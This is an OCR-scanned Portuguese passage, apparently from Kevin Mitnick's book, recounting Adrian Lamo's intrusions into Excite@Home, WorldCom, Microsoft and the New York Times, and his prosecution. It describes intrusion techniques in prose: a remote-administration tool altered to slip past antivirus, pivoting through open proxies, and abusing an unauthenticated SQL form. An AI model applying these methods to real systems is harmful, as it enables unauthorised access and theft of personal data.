A paciencia acabou compensando, e Adrian passou para a etapa seguinte: instalar um Remote Access 
Trojan (um 'RAT'). Mas, para fazer isso, ele nao usou nenhum daqueles Tróias comumente disponiyeis, 
desenvolvidos por um hacker, do tipo que os outros inyasores usam com mas intenęoes. Programas antiyirus, 
tao populares hoje em dia, devem reconhecer programas back door e Tróia e coloca-los imediatamente em 
quarentena. Para contomar isso, Adrian encontrou uma ferramenta legitima usada por administradores de 
rede e de sistema — um software comercial de administraęao remota que ele modifica levemente, de modo a 
ficar invisivel ao usuario. 

Embora os produtos antiyirus busquem detectar os tipos de software de acesso remoto usados pelo hacker 
do submundo, eles nao procuram software de acesso remoto desenvolvido pelas outras empresas comerciais 
de software, porque supoem que esses produtos estejam sendo usados legitimamente 
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(e tambem, acredito, porąue o desenvolvedor do software X da empresa poderia abrir processo se o software 
antmrus considerasse seu produto suspeito e o bloąueasse). Pessoalmente, penso que essa seria uma ma ideia; os 
produtos antivirus deveriam alertar o usuario sobre qualquer produto que pudesse ser usado com mas intenęoes e 
deixa-lo decidir se foi instalado legitimamente. Tirando vantagem dessa 'falha'. Adrian conseguia, freqiientemente, 
instalar RATs 'legitimos' que subvertiam a detecęao de programas antivirus. 

Uma vez instalado com sucesso o RAT no computador @Home do funcionario, ele executava uma serie de 
comandos que lhe fomeciam informaęoes sobre as conexoes ativas de rede a outros sistemas de computador. Um 
deles, o 'netstaf. mostrava a atividade de rede de um funcionario que naquele momento estava conectado a Intranet 
@Home por dial-in e revelava os sistemas de computador na rede corporativa interna que a pessoa estava usando 
naquele momento. 

A firn de exibir uma amostra dos dados devolvidos pelo netstat, executei o programa para examinar a operaęao 
na minha maquina. A listagem resultante em parte era assim: 


C:\Documents and Settinqs\quest>netstat -a 

Active Connections 

Proto Local Address 

State 

Foreign Address 

TCP lockpicker:1411 

ESTABLISHED 

64.12.26.50:5190 

TCP lockpicker;2842 

ESTABLISHED 

catlow.cvberverse.com:22 

TCP lockpicker:2982 

ESTABLISHED 

www.kevinmitnick.com:http 


O 'Local Address' lista o nome da maquina local ('lockpicker' era na epoca o nome que eu usava para o meu 
computador) e o numero da porta daquela maquina. O 'Foreign Address' mostra o nome do host ou endereęo IP do 
computador remoto e o numero da porta em que uma conexao foi feita. Por exemplo, a primeira linha da listagem 
indica que meu computador estabeleceu uma conexao a 64.12.26,50 na porta 5190, a que costuma ser usada para a 
AOL Instant Messenger. 'State' indica o status da conexao; 'Established', se a conexao estiver ativa; 'Listening', se a 
maquina local estiver aguardando uma conexao. 

A linha seguinte, incluindo a entrada 'catlow.cyberverse.com', fomece o nome do host do sistema de computador 
com o qual me conectei. Na ultima linha, a entrada www.kevinmitnick.com : http indica que eu estava ativamente 
conectado ao meu site Web pessoal. 

O dono do computador destinatario nao precisa executar servięos em portas conhecidas, mas pode configurar o 
computador para usar portas nao-padronizadas. Por exemplo, HTTP (servidor Web) e executado comumente na porta 
80, mas o dono pode mudar isso para executar um senddor Web na porta que escolher. Ao listar as conexoes TCP de 
funcionarios, Adrian descobriu que funcionarios da @Home estavam se conectando a servidores Web em portas nao- 
padronizadas. 
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Com informaędes como essas, Adrian conseguiu obter endereęos IP para maąuinas intemas que valeria a 
pena explorar para obter informaęoes confidenciais da empresa da @Home. Entre outras preciosidades, 
descobriu um banco de dados de nomes, e-mails, numeros seriais de modem a cabo, endereęos IP atuais e 
mesmo qual o sistema operacional do computador do cliente que estaria sendo executado — para cada um 
dos quase tres milhoes de assinantes da banda larga da empresa. 

Esse era um 'ataque exótico', nas palavras de Adrian, porque envolvia o seqiiestro de urna conexao de um 
funcionario que estivesse off-site discando para a rede. 

Adrian considera esse processo bem simples de ser executado em urna rede- A parte dificil — que levou 
um mes de tentativas e erros — foi compilar um mapa detalhado da rede: quais sao as diferentes partes e 
como elas se relacionam umas com as outras. 

O engenheiro-chefe da rede para a Excite@Home era um homem a quem Adrian tinha dado informaędes 
no passado e sentiu que poderia ser confiavel. Deixando de lado seu costume de usar um intermediario para 
passar informaęoes para urna empresa onde ele tinha penetrado, ligou diretamente para o engenheiro e 
explicou que havia descoberto algumas vulnerabilidades cruciais na rede da empresa. O engenheiro 
concordou em encontra-lo, apesar de Adrian ter proposto que fosse bem tarde, e o encontro aconteceu a 
meia-noite. 

"Eu lhe mostrei parte da documentaęao que reuni. Ele ligou para o responsavel pela seguranęa e nos o 
encontramos no campus [Excite@Home] perto das quatro e meia da manha." Os dois homens examinaram o 
materiał de Adrian e perguntaram exatamente como ele tinha invadido. Perto das seis da manha, quando 
estavam terminando, Adrian disse que gostaria de ver o proxy real que havia usado para conseguir acesso. 

Nós o encontramos. E eles me perguntaram: "Como voce tornaria esta maąuina segura?". 

Adrian ja sabia que o servidor nao estava sendo usado para nenhuma funęao essencial, que era apenas um 
sistema aleatório. 

Tirei meu canivete do bolso, um daqueles tipo suięo, vistoso, com peąuenos abridores, e fui em 

frente. Cortei o cabo e falei: "Agora a maquina esta segura". Eles disseram: "Isso ja basta". O 

engenheiro fez uma anotaęao e colou na maquina. O aviso dizia: "Nao ligue". 

Adrian tinha descoberto acesso a essa empresa importante graęas a uma unica maquina que 
provavelmente nao tinha funęao ha muito tempo, mas ninguem notou nem se incomodou em remove-la da 
rede. "Qualquer empresa", diz Adrian, "tera toneladas de maquinas sem funęao, ainda ligadas, mas sem 
serem usadas." Cada uma e um potencial para invasao. 

MCI WorldCom 

Como fez com tantas outras redes antes, mais uma vez Adrian foi atacando os servidores proxy cujas 
chaves descobriu no reino da WorldCom. Ele comeęou a busca usando sua ferramenta preferida 
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para navegar em computadores, um programa chamado ProxyHunter, que localiza servidores proxy abertos. Com 
essa ferramenta funcionando em seu laptop, escaneou o espaęo de endereęos da WorldCom da Internet Corporativa, 
identificando rapidamente cinco proxies abertos — um escondendo claramente urna URL que terminava em 
wcom.com . De la só precisava configurar seu browser para usar um dos proxies e entao navegar na rede privada da 
WorldCom com a mesma facilidade que qualquer funcionario. 

Urna vez na rede, descobriu outros nlveis de seguranęa. Senhas eram exigidas para acesso a varias paginas Web 
da Intranet. Tenho certeza de que algumas pessoas acharao surpreendente a paciencia que atacantes como Adrian tern 
e quantas horas eles se dispoem a dedicar ao ataque, determinados a vencer. Dois meses depois, Adrian finalmente 
comeęou a fazer incursoes. 

Ele conseguiu acesso ao sistema de Recursos Humanos da WorldCom, o que lhe permitia saber os nomes e os 
numeros de previdencia social de todos os 86 mil funcionarios da empresa. Com essa informaęao e a data de 
nascimento de urna pessoa (ele jura que por meio do anybirthday.com) , podia inserir urna nova senha de um 
funcionario e acessar os registros da folha de pagamentos, inclusive descobrir informaęoes como salario e contatos de 
emergencia. Ele podia ate modificar os dados bancarios para depósito, desviando contracheques de varios 
funcionarios para sua conta cor-rente. Nao cedeu a tentaęao, mas obseryou que "muita gente estaria disposta a arrasar 
por algumas centenas de milhares de dólares". 

Dentro da Microsoft 

Na ocasiao em que foi realizada esta entrevista, Adrian estava aguardando sentenęa por varias acusaęoes. Ele 
tinha urna historia a contar sobre um incidente do qual nao foi acusado, mas em cujas informaęoes, dmilgadas pelo 
promotor federal, foi incluido. Nao querendo sofrer mais acusaęoes que aquelas que ja estavam na lista do promotor, 
achou melhor ser discreto ao nos contar urna historia sobre a Microsoft. Medindo bem as palavras, explicou: 

Posso lhes dizer o que foi alegado. A suposięao era de que havia uma pagina Web descoberta por mim 

que nao exigia autenticaęao, nao tinha indicaęao de propriedade [das informaęoes], nao tinha 

absolutamente nada, exceto um menu de busca. 

Nem mesmo o 'rei' das empresas de software sempre mantem a seguranęa devida de seus computadores. 

Entrando com um nome, Adrian 'supostamente' descobriu os detalhes de um pedido on-line de um cliente. O site 
foi descrito pelo govemo, diz Adrian, como um daqueles que armazenam informaęoes sobre compras e entregas de 
todos os que compraram on-line do site Web da Microsoft, alem de conter dados sobre pedidos a serem pagos com 
cartoes de credito que tinham sido recusados. Tudo isso seria constrangedor caso as informaęoes se tomassem 
disponiyeis a qualquer pessoa de fora da empresa. 

Adrian forneceu detalhes da falha de seguranęa da Microsoft a um reporter do Washington Post em quem 
confiava, com a condięao de que nada seria publicado ate que a folha fosse corrigida. O reporter repassou as 
informaęoes para a Microsoft, e o pessoal de TI nao gostou de saber da inyasao. 
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"A Microsoft ąueria realmente fazer as acusaęoes", diz Adrian, "Eles fomeceram cifras que trariam grandę prejuizo 
— uma fatura de cem mil dólares." Alguem na empresa pode, depois, ter tido segundas intenęoes em relaęao a isso. 
Adrian foi informado posteriormente de que a Microsoft tinha "perdido a fatura". A acusaęao de invasao foi 
registrada, mas sem a fatura em dólares. (De acordo com os arquivos on-line do jomal, os editores do Post nao 
acharam que valeria a pena divulgar o incidente, apesar de a Microsoft ser o alvo e de um de seus jomalistas ter 
participado dessa historia. Tudo isso faz pensar.) 

Um herói, mas nao um santo: o hack do New York Times 

Adrian um dia estava navegando pelo site Web do New York Times, quando de repente sentiu uma 'curiosidade 
momentanea de saber se poderia descobrir uma maneira de invadir a rede de computadores do jomal. "Eu ja tive 
acesso ao Washington Post", disse, mas admitiu que o esforęo nao resultou em nada: "nao achei nada de muito 
interessante". 

O Times parecia-lhe um desafio maior, uma vez que eles provavelmente haviam se tornado intransigentes na 
questao de seguranęa depois que tinha acontecido um hack muito dmdgado e constrange-dor alguns anos antes, 
quando um gmpo chamado HFG ('Hacking for girlies') fez uma desfiguraęao de seu site Web. O gmpo criticou o 
artigo que John Markoff, articulista de tecnologia, escreveu sobre mim, que contribuiu para o tratamento duro que 
recebi do Departamento de justięa. 

Adrian ficou on-line e comeęou a explorar. Primeiro visitou o site Web, e descobriu rapidamente que era 
terceirizado; o host nao era o Times, mas um 1SP extemo. Essa e uma boa pratica para qualquer empresa: significa 
que uma invasao bem-sucedida no site Web nao da acesso a rede corporativa. Para Adrian, significava que ele teria 
de trabalhar um pouco mais para encontrar um modo de entrar. 

"Eu nao sigo checklist", diz Adrian sobre seu modo de realizar as invasoes. Mas "quando estou fazendo um 
reconhecimento, tomo cuidado para reunir informaęoes e investigar outras fontes". Em outras palavras, ele nao 
comeęa explorando imediatamente o site Web da empresa que esta atacando, uma vez que isso poderia fazer com que 
uma auditoria seguisse seu rastro e o descobrisse. Em vez disso, ha ferramentas de pesquisa valiosas e disponiveis, 
gratis, em American Registry for Internet Numbers (Arin), uma organizaęao sem fins lucrativos responsavel por 
dirigir os recursos para numeros da Internet para a America do Norte. 

Entrando no New York Times, na caixa de dialogo Whois da arin.net, obtem-se uma listagem de dados parecidos 
com estes: 

New York Times (NYT-3) 

NEW YORK TIMES COMPANY (NYT-4) 

New York Times Digital (NYTD) 

New York Times Digital (AS21568) NYTD 21568 

NEW YORK TIMES COMPANY NEW-Y0RK84-79 (NET-12-160-79-0-1) 

12.160.79.0 - 12.160.79.255 

New York Times SBC0681210B0232040219 (NET-68-121-80-232-1) 
68.121.80.232 - 68.121.80.239 

New York Times Digital PNAP-NYM-NYT-RM-01 (NET-64-94-185-0-1) 
64.94.185.0 - 64.94.185.255 
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Os ąuatro grupos de numeros separados por pontos sao endereęos IP que podem ser considerados como 
equivalentes, na Internet, a um endereęo com o numero da casa, o nome da rua, da cidade e do estado em que alguem 
mora. Urna listagem que mostra urna serie de endereęos (por exemplo, 12.160.79.0 - 12.16079.255) e referida como 
net błock. 

A seguir, Adrian fez urna busca por portas numa serie de endereęos pertencentes ao New York Times e aguardou 
enquanto o programa escaneava endereęos que procuravam portas abertas, na esperanęa de conseguir identificar 
alguns sistemas interessantes que pudesse atacar. E identificou. Examinando um numero de portas abertas, ele 
descobriu que nele tambem havia varios sistemas que executavam proxies abertos mai configurados, o que lhe 
permitia conectar-se a computadores na rede interna da empresa, 

Ele investigou o DNS do jomal esperando encontrar um endereęo IP que nao fosse terceirizado, mas interno ao 
Times, sem obter sucesso. Em seguida, tentou extrair todos os registros de DNS para o dominio nytimcs.com . 
Esgotada tambem essa tentativa, voltou para o site Web e, dessa vez, obteve mais sucesso: descobriu um lugar no site 
que oferecia aos yisitantes urna lista de endereęos de e-mail de todos os funcionarios do Times que estivessem 
dispostos a receber mensagens do publico. 

Em minutos Adrian recebeu urna mensagem de e-mail do jomal, Nao era a lista de e-mails do reporter que tinha 
pedido, mas era valiosa. O cabeęalho do e-mail revelou que a mensagem vinha da rede interna da empresa e mostrava 
um endereęo IP que nao era publicado. "As pessoas nao percebem que mesmo um e-mail pode ser revelador", ressalta 
Adrian. 

O endereęo IP interno deu-lhe urna altemativa possivel. O passo seguinte foi comeęar a passar por proxies 
abertos que ja tinha encontrado, escaneando manualmente os endereęos de IP dentro do mesmo segmento de rede. 
Para deixar mais claro, digamos que o endereęo fosse 68.121.90.23. A maioria dos atacantes escanearia o netblock 
desse endereęo iniciando com 68.121.90.1 e continuaria ate 68.121.90.254, Mas Adrian tentou se pór no lugar de um 
tecnico de TI da empresa que estivesse instalando a rede e imaginou que a tendencia natural da pessoa seria escolher 
numeros redondos. Entao, ele costumava comeęar com os numeros mais baixos — .1 a ,10 e, entao, correr as dezenas 
— .20, .30 e assim por diante. 

O esforęo nao parecia estar produzindo muitos resultados. Adrian descobriu alguns seryidores Web intemos, mas 
nenhum que fosse rico em informaęoes. Por acaso, encontrou um seryidor com um site antigo de intranet do Times 
que nao era mais usado; talvez tivesse sido desatiyado quando o novo site entrou no ar e desde entao ficou esquecido. 
Ele o achou interessante, leu e descobriu um link que supostamente iria para um velho site de produęao, mas 
desligava, em vez de leva-lo a urna maquina de produęao ativa. 

Para Adrian, esse foi o Santo Graal. A situaęao comeęou a parecer ainda mais clara quando ele descobriu que 
essa maquina armazenava materiais de treinamento para ensinar os funcionarios a usarem o sistema, algo semelhante 
a um estudante que folheia rapidamente um resumo do romance Grandes expectativas, de Dickens, em vez de ler o 
livro todo e fazer o trabalho sozinho. 

Adrian tinha inyadido sites demais para sentir qualquer emoęao por ter sucesso na empreitada, mas estava 
conseguindo mais progresso do que podia esperar, E ia ficar melhor ainda. Logo, desco-briu um mecanismo de busca 
embutido, de uso dos funcionarios, para navegar pelo site. "Frequentemente", diz ele, "os administradores de sistemas 
nao os configuram adequadamente e por isso e possiyel fazer buscas que deyeriam ser proibidas." 


na 
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E esse foi o caso. O mecanismo fomeceu a Adrian o que ele chamou de 'o golpe finał'. Algum 
administrador de sistemas do Times havia colocado um utilitario em um dos diretórios que permitia fazer o 
que e chamado de consulta livre SQL O SQL (Stractured Query Language) e uma linguagem-padrao usada 
para pesquisar a maioria dos bancos de dados. Nesse caso, uma caixa de dialogo popup apareceu, permitindo 
que Adrian digitasse comandos SQL sem autenticaęao, o que significava que poderia fazer busca em 
praticamente qualquer um dos bancos de dados no sistema e recolher ou trocar informaędes a yontade. 

Adrian reconheceu que o dispositivo em que ficavam os servidores de e-mail estava funcionando com o 
Lotus Notes. Os hackers sabem que as vers5es mais antigas do Notes permitem a um usuario passar por 
todos os outros bancos de dados naquele sistema, e essa parte da rede do Times estava funcionando com uma 
versao mais antiga. O banco de dados do Lotus Notes que Adrian tinha encontrado o deixava "na maior 
empolgaęao, porque eles incluiram todos, desde a direęao a cada dono de banca, quanto eles ganhavam e 
seus dados pessoais", incluindo o numero da previdencia social. "Havia ainda informaęao do assinante e de 
qualquer um que escrevesse para reclamar do servięo ou fazer solicitaęoes." 

Ao lhe perguntarem que sistema operacional o Times estava usando, Adrian respondeu que nao sabia. 
"Nao analiso uma rede dessa forma", explicou. 

Nao e a tecnologia, sao as pessoas e como elas configuram as redes. A maioria das 
pessoas e muito previsivel. Freąiientemente, descubro que elas constroem redes 
quase sempre do mesmo modo. 

Muitos sites eCommerce cometem esse erro. Eles supoem que as pessoas farao 
entradas no pedido adequado. Ninguem supoe que o usuario deixara de efetuar o 
pedido. 

Em yirtude dessa previsibilidade, um bom atacante poderia colocar um pedido num site Web on-line, 
passar pelo processo de compra ate o momento em que seus dados fossem yerificados e entao voltar e mudar 
as informaęoes de conta. O atacante pega a mercadoria, e alguem paga o debito no cartao de credito. (Embora 
Adrian tenha explicado o procedimento detalhadamente, ele pediu que nao publicassemos a descrięao 
completa, porque ela permitiria que outras pessoas fizessem isso.) 

O que Adrian quer ressaltar e que as administradoras de sistemas nao costumam prever o raciocinio de 
um atacante, tomando a tarefa dele muito mais facil. E e isso o que explica o sucesso dele na etapa seguinte, a 
de penetrar na rede de computadores do Times. O mecanismo interno de busca nao deveria ser capaz de 
indexar todo o site, mas foi. Ele descobriu um programa que trazia um formulario SQL que lhe permitia 
controlar os bancos de dados, inclusive digitar perguntas para obter informaędes. Entao ele teve de descobrir 
os nomes dos bancos de dados naquele sistema e identificar aqueles que pareciam interessantes. Foi assim 
que descobriu um banco de dados de grandę interesse: ele continha uma lista completa de nomes de usuarios 
e senhas que pareciam ser de todos os funcionarios do New York Times. 

A maioria das senhas, ficou claro, era simplesmente os quatro ultimos digitos do numero da previdencia 
social das pessoas. E a empresa nao se preocupaya em usar senhas diferentes para acessar 
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areas com informaęoes delicadas — a mesma senha do funcionario servia em toda parte no sistema. E, pelo que se 
sabe, disse Adrian, as senhas no Times nao estao mais seguras hoje do que eram na epoca em que ele fez o ataque. 

De la consegui entrar de novo na Intranet e acessar informaęoes adicionais. Pude ate chegar na redaęao e 

me conectar como editor-chefe, usando a senha dele. 

Ele descobriu urn banco de dados em que constava o nome de cada pessoa acusada de terrorismo nos Estados 
Unidos, inclusive aqueles nomes que nao tinham sido divulgados. Continuando a explorar, localizou um banco de 
dados de todos aqueles que davam suas opinioes no painel do leitor do Times. Eram milhares de colaboradores, e o 
banco revelava seus endereęos, seus numeros de telefone e da previdencia social. Adrian fez urna busca por 
'Kennedy' e encontrou varias paginas com informaęoes. O banco de dados trazia informaęoes para contato com 
celebridades e figuras publicas que variavam de professores de Harvard a Robert Redford e Rush Limbaugh. 

Adrian acrescentou o próprio nome e o numero do seu celular (com base em um código de area do norte da 
Califómia, o numero e '505-HACK'). Obviamente, contando que o jomal nunca imaginaria que a listagem havia sido 
colocada la e aparentemente esperando que algum reporter ou editor do painel do leitor pudesse receber, ele 
completou o campo de experiencia digitando 'hacking de computadores/inteligencia de seguranęa e comunicaęoes'. 

Esse foi um grandę erro, talvez imperdoavel. Mesmo assim, para mim a aęao nao só foi inofensiva, mas 
divertida. Ainda morro de rir só de imaginar Adrian recebendo um telefonema: "Aló, Sr. Lamo? Aqui e fulano, do 
New York Times". E entao a pessoa menciona urna opiniao ou talvez lhe peęa que escreva seiscentas palavras sobre 
seguranęa de computadores ou algo do genero para ser publicado no dia seguinte, na pagina de opiniao do leitor do 
jomal mais influente do pais. 

Ha mais coisas na saga de Adrian e do New York Times, mas o resto nao e engraęado. Nao era necessario, nao era 
caracteristico de Adrian, e causou serios problemas para ele. Depois de alterar as listagens do banco de dados da 
pagina de opiniao do leitor, ele descobriu que tinha acesso a assinatura da LexisNexis, feita pelo Times, um servięo 
on-line que os assinantes utilizam para obter informaęoes e noticias. 

Ele supostamente teria estabelecido cinco contas separadas e feito diversas buscas — mais de tres mil, de acordo 
com o govemo. 

Depois de navegar tres meses pela LexisNexis sem que o New York Times tivesse a menor ideia de que suas 
contas tinham sido sequestradas, Adrian finalmente adotou o comportamento de Robin Hood que tinha caracterizado 
seus ataques anteriores a outras empresas. Entrou em contato com um jomalista conhecido da Internet (como eu, um 
ex-hacker) e explicou a vulnerabilidade que tinha explorado e que havia lhe dado acesso ao sistema de computadores 
do New York Times — mas somente depois de fazer um acordo com o reporter de que ele nao publicaria nenhuma 
informaęao sobre a invasao antes de o Times ser informado e corrigir o problema. 

O reporter me disse que, quando entrou em contato com o Times, a conversa nao foi bem do jeito que ele ou 
Adrian esperavam. O Times, disse ele, nao estava interessado no que ele tinha a dizer, nao queria nenhuma 
informaęao; seu interesse era falar diretamente com Adrian para descobrir os detalhes, e eles cuidariam de tudo 
sozinhos. A pessoa do Times com quem o reporter falou 
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nem quis saber qual tinha sido o metodo de acesso e só concordou em anotar os detalhes porque o reporter insistiu. 

O jomal checou a vulnerabilidade e em 48 horas tinha corrigido a falha, diz Adrian. Mas os executivos do Times 
nao gostaram de ter sido chamados a atenęao por causa do problema de seguranęa. O ataque anterior, 'Hacking for 
girlie', havia sido muito dmilgado na imprensa, e o constrangimento deles, sem duvida, foi grandę, porque os 
responsaveis nunca foram pegos. (E nao pense que eu tive qualquer ligaęao com o ataque; na epoca, estava na prisao, 
aguardando julgamento.) Pode-se supor, seguramente, que o pessoal de TI do jomal foi muito pressionado para 
assegurar que eles nunca mais seriam vitimas de urna invasao de hacker. Entao, a exploraęao de Adrian em sua rede 
de computadores pode ter ferido o ego de alguns e a reputaęao de outros, o que explicaria a atitude inflexivel do 
jomal quando soube que ele estava tirando vantagem de sua generosidade neo-intencional ha meses. 

Talvez o Times estivesse disposto a demonstrar consideraęao por ter tido tempo para corrigir a falha em seu 
sistema de computadores antes de a noticia aparecer na imprensa. Talvez tenha sido somente quando eles 
descobriram o uso do LexisNexis que decidiram tomar urna medida dura. Independentemente da razao, as 
autoridades do Times fizeram o que nenhuma das vitimas de Adrian tinha feito: chamar o FBI, 

Varios meses depois, Adrian soube que o FBI estava a procura dele e desapareceu. Os agentes federais 
comeęaram a visitar a familia, os amigos e os conhecidos, apertando o cerco e tentando descobrir se ele tinha deixado 
algum contato com jomalistas para descobrirem por onde andava. O piano mai elaborado resultou em tentativas de 
levar varios repórteres a quem Adrian tinha dado informaęoes a depor em juizo. "O jogo", escreveu um jomalista, "de 
repente se tomou serio." 

Adrian desistiu de continuar se escondendo depois de apenas cinco semanas. Para a rendięao, ele escolheu um de 
seus lugares prediletos para ser explorado: a Starbucks. 

Quando a poeira abaixou, um press release dmilgado pela agencia do United States Attomey, do Distrito Sul de 
Nova York, afirmava que "o prejuizo" causado pelo hack de Adrian ao New York Times "era [sic] de 
aproximadamente trezentos mil dólares". Suas transferencias gratuitas, de acordo com o govemo, chegavam a 18 por 
cento de todas as buscas que o LexisNexis fez das contas do New York Times durante sua travessura no site deles 2 . 

O govemo aparentemente tinha feito o calculo com base no que a acusaęao faria para voce ou para mim — ou 
para qualquer um que nao fosse assinante do LexisNexis. Para realizar buscas individuais, pagas individualmente, 
urna taxa muito mais alta, de 12 dólares, e cobrada por urna unica consulta. Mesmo calculado de modo nwerossimil, 
Adrian teria de fazer em torno de 270 buscas todo dia, durante tres meses, para chegar a um total alto como aquele. E 
como as grandes organizaęoes, como o limes, pagam urna taxa mensal por acesso ilimitado ao LexisNexis, e provavel 
que nunca tenham pago um centavo pelas buscas adicionais de Adrian. 

De acordo com Adrian, o episódio do New York Times foi exceęao em sua carreira de hacking. Ele diz que 
recebeu agradecimentos tanto da Excite@Home quanto da MCI WorldCom (o que foi o mais gratiflcante de tudo, 
urna vez que eles confirmaram que Adrian poderia, realmente, ter feito transferencias do pagamento de centenas de 
funcionarios para urna conta corrente que estivesse sob seu controle). Adrian nao parece triste e deixa transparecer 
naturalidade quando diz que "o New York Times foi o unico que quis me ver processado". 
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Para piorar ainda mais as coisas para ele. aparentemente o govemo, de algum modo, induziu varias 
vitimas de Adrian a registrar queixas por danos sofridos — incluindo algumas empresas que tinham lhe 
agradecido pelas informaęoes fomecidas. Mas talvez isso nao seja surpreendente: uma solicitaęao de 
cooperaęao por parte do FBI ou de um promotor federal nao e algo que a maioria das empresas ignoraria, 
mesmo que tivesse considerado a questao de outro modo na epoca. 

As singulares habilidades de Adrian 

Adrian e um hacker bem atipico, pois nao e fluente em nenhuma linguagem de programaęao. O sucesso 
dele, em vez disso, deve-se a analise de como as pessoas pensam, de como instalam sistemas, os processos 
usados por administradores de sistemas e de redes para fazer arquitetura de rede. Embora ele se ache uma 
pessoa de memória fraca, consegue descobrir yulnerabilidades ao investigar aplicatiyos Web de uma 
empresa para obter acesso a sua rede. Entao vai fuęando na rede, construindo pacientemente um diagrama 
mental de como as peęas se relacionam, ate que consegue 'materializar' em algum canto da rede aquilo que a 
empresa pensou estar escondido nos recessos escuros da inacessibilidade e, portanto, a salvo de ataques. 

A própria descrięao que ele faz revela o inesperado: 

Acho que ha caracteristicas comuns em qualquer sistema complexo, seja num computador, seja 
no universo. Nós mesmos incluimos essas caracteristicas como facetas individuais do sistema. Se 
voce consegue ter uma noęao subconsciente desses padroes, as vezes eles funcionam a seu favor, 
o conduzem a lugares estranhos. O [hacking] sempre esteve, para mim, menos relacionado a 
tecnologia e mais a religiao. 

Adrian sabe que se ele resolver, deliberadamente, comprometer uma caracteristica especifica de um 
sistema, o esforęo muito provavelmente ffacassara. Mas se ficar vagando, orientado principal-mente pela 
intuięao, acabara chegando aonde deseja, 

Adrian nao acredita que a abordagem dele seja particularmente unica, mas reconhece nunca ter 
encontrado nenhum outro hacker que obteve sucesso desse modo. 

Uma das razoes pelas quais nenhuma dessas empresas que gastam milhares e milhares de 
dólares na detecęao de hackers nunca ter me detectado e que eu nao faęo o que vim invasor 
comum faz. Quando identifico um sistema de rede aberto, vejo-o da maneira como 
supostamente foi feito. Penso: M Tudo bem, os funcionarios acessam informaęoes do cliente. Se 
eu fosse funcionario, o que pediria [ao sistema] para fazer?". E dificil [para o sistema] 
distinguir atividade legitima de ilegitima, porque voce vai passar pela mesma interface que um 
funcionario passaria. E essencialmente o mesmo trafego. 

Uma vez que Adrian tern o layout da rede em sua mente, "trata-se menos de olhar numeros numa tela e 
mais de ter uma ideia de realmente estar la, identificando padroes. E um modo de ver, uma visao da 
realidade. Nao posso defmi-la, mas vejo-a em minha cabeęa. Noto o que vive onde, 
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como se inter-relaciona e se conecta. E muitas vezes isso me leva ao que algumas pessoas consideram 
surpreendente". 

Durante urna entrevista com a NBC Nightly News em Washington, DC. Adrian foi desafiado a Dentar 
invadir o sistema da NBC. Ele diz que, com as cameras ligadas, pós dados confidenciais na tela em menos de 
cinco minutos. 3 

Adrian tenta abordar um sistema tanto como um fimcionario quanto como um usuario extemo faria. Ele 
acredita que a dicotomia diz a sua intuięao aonde ir em seguida. Ate representa um papel, fmgindo para si 
mesmo que e fimcionario e tern de cumprir urna tarefa especifica, pensando e agindo da maneira apropriada. 
Isso funciona tao bem com ele que ha muito tempo as pessoas deixaram de ignorar seu sucesso excepcional e 
de admitir que ele consegue tatear no escuro. 

Informaęao facil 

Urna noite, na mesma Starbucks aonde eu tinha ido tomar cafe com ele, Adrian escutou urna conversa. 
Ele estava sentado na mesa, com urna xicara de cafe na sua frente, quando um carro estacionou e dele sairam 
cinco homens. Eles se sentaram numa mesa próxima, e Adrian ouviu a conversa. Logo ficou evidente que 
eram da policia, e ele teve certeza de que eram do FBI. 

Eles conversaram cerca de uma hora, totalmente alheios ao fato de que eu estava sentado la, sem 
tocar o meu cafe. Conversavam sobre o trabalho — quem era querido, 
quem nao era. 

Eles faziam piadas de agentes, sobre como se podia perceber o poder de uma agencia pelo 
tamanho de sua insignia. Os agentes do FBI usam insignias muito pequenas, enquanto os do 
Fish & Gamę Department trazem insignias enormes. Entao, o poder esta na proporęao inversa. 
Eles acharam isso engraęado. 

Ao sairem, os agentes deram uma olhada rapida para Adrian, como se tivessem acabado de perceber que 
o jovem olhava para um cafe frio e poderia ter ouvido coisas que nao deveria. 

Outra vez, Adrian conseguiu, com um unico telefonema, descobrir informaęoes essenciais sobre a AOL. 
Embora seus sistemas de TI fossem bem protegidos, ele diz que expós uma seria vulnerabilidade quando 
ligou para a empresa que fabrica e instala cabos de fibra óptica. Adrian afirma ter recebido todos os mapas 
cyber que mostravam onde haviam sido enterrados os cabos principais C de backup da AOL. "Eles 
simplesmente supunham que se voce soubesse ligar para eles, nao deveria ter dificuldade para conversar com 
eles." Um hacker disposto a causar problemas poderia ter custado milhoes de dólares a AOL no momento em 
que fosse interrompido seu funcionamento ou quando houvesse reparos. 

Isso e assustador. Adrian e eu concordamos. E espantoso como as pessoas podem ser tao descuidadas 
com relaęao as informaęoes. 

Hoje em dia 

No verao de 2004, Adrian Lamo foi sentenciado a seis meses de confmamento domiciliar e dois anos de 
liberdade superyisionada, O Tribunal tambem ordenou-lhe pagar 65 mil dólares em restituięao 
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as suas yitimas 4 . Considerando o ganho potencial de Adrian e sua falta de recursos (ele nao tinha casa 
naąuela epoca, pelo amor de Deus), essa ąuantia de restituięao e claramente punitiva. Ao estipular uma cifra 
para restituięao, o Tribunal deve levar em conta inumeros fatores, inclusive a capacidade presente e futura de 
o reu pagar, e as perdas reais sofridas por suas yitimas. Uma ordem de restituięao nao deve ser um ato 
punitiyo. Na minha opiniao, o juiz nao considerou realmente a possibilidade de Adrian pagar uma ąuantia 
tao grandę, mas e provavel que, em vez disso, tenha estipulado a ąuantia como uma maneira de transmitir 
uma mensagem, uma vez que o caso de Adrian foi muito explorado nos noticiarios. 

Enąuanto isso, ele esta se reabilitando e levando sua vida. Assiste a aulas de jomalismo numa faculdade 
comunitaria em Sacramento; tambem escreve artigos para um jomal local e esta comeęando a fazer alguns 
tfee lances. 

Para mim, o Jornalismo e a melhor carreira que eu poderia escolher, pois com ele continuo 
sendo yerdadeiro com o que me instiga — a curiosidade, a yontade de ver as coisas de um modo 
diferente, querer saber mais sobre o mundo a minha volta. Os mesmos motivos que o hacking. 

Adrian esta, espero, sendo honesto consigo mesmo e comigo ąuando fala que tern consciencia de que 
deve dar um novo rumo a sua vida. 

Eu estaria mentindo se dissesse que penso que as pessoal podem mudar do dia para a noite. Nao 
consigo deter minha curiosidade de uma hora para outra, mas posso canaliza-la e aplica-la de 
um modo que nao prejudique as pessoas. Se ha uma coisa de que me conscientizei com esse 
processo ó que ha pessoas reais por tras das redes. Eu realmente nao consigo pensar em uma 
inyasao em computador sem considerar as pessoas que tem de ficar acordados yarias noites 
preocupando-se com isso. Acho que, para mim. o jornalismo e a fotografia sao substitutos 
intelectuais do crime. Eles me permitem exercitar minha curiosidade, me deixam ver as coisas 
